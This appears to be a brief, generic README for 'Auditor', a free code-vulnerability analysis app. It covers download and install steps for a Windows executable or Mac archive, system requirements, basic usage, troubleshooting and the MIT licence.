Welcome to Auditor! This application helps you analyze your code for vulnerabilities and security issues. It is designed for everyone, even if you're not a programmer.
- Code Analysis: Examine your code to find hidden bugs.
- Security Checks: Identify potential security risks.
- User-Friendly Interface: Easy for anyone to use.
- Multi-Language Support: Works with JavaScript, Python, TypeScript, and more.
To get started with Auditor, visit this page to download: Auditor Releases.
- Click the link above to go to the Releases page.
- Find the latest version of Auditor.
- Download the file for your operating system. For Windows users, this might be something like
Auditor-win.exe; for Mac, it could beAuditor-mac.zip. - Once the download is complete, locate the file on your computer.
- Double-click the file to run Auditor.
Feel free to refer back to this section if you need to download again.
Auditor runs on various operating systems. Ensure your setup meets these requirements:
- Operating System: Windows 10 or later, macOS 10.15 or later, or a Linux distribution.
- Memory: Minimum 4 GB RAM.
- Storage: At least 150 MB of available space.
Using Auditor is straightforward:
- Launch the Application: Open the Auditor application you installed.
- Select Your Project: Choose the folder that contains the code you want to analyze.
- Run the Analysis: Click the βAnalyzeβ button to start the process. This might take a few moments depending on the size of your code.
- Review Results: Once the analysis is complete, check the results. Auditor will highlight areas that need attention and offer suggestions.
If you encounter any issues:
- Check Your Version: Ensure you have the latest version of Auditor.
- Reinstall the Application: If the app does not start, try reinstalling it.
- Contact Us: If problems persist, reach out for support on the GitHub Issues page.
Auditor currently supports JavaScript, Python, TypeScript, and other popular languages.
Yes, you can use Auditor on Linux. Make sure you download the appropriate package for your distribution.
Yes, Auditor is completely free to use.
For more details, visit the Documentation Page.
We welcome contributions! If you have ideas or improvements, please check out our guidelines on contributing in the repository.
Auditor is released under the MIT License. You can use and modify it as you wish, but please give credit to the original authors.
Thank you for choosing Auditor as your code analysis tool. With its focus on security and usability, Auditor makes smart code review accessible for everyone. For updates, be sure to check back on the Releases page.